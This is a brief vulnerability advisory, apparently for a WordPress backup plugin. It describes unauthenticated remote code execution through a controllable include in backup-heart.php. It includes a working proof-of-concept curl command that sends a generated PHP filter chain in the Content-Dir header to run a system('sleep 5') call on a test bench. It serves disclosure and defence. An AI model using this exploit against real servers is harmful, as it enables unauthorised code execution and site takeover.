Description The plugin is vulnerable to Remote Code Execution via the /includes/backup-heart.php file. This is due to an attacker being able to control the values passed to an include, and subsequently leverage that to achieve remote code execution. This makes it possible for unauthenticated attackers to easily execute code on the server.
Using the PHP Filter Chain Generator: https://github.com/synacktiv/php_filter_chain_generator
time curl -X POST http://wpscan-vulnerability-test-bench.ddev.site/wp-content/plugins/backup-backup/includes/backup-heart.php -H "Content-Dir: `python3 ./php_filter_chain_generator.py --chain '<?php system("sleep 5"); ?>' | grep --color=never '^php://filter'`"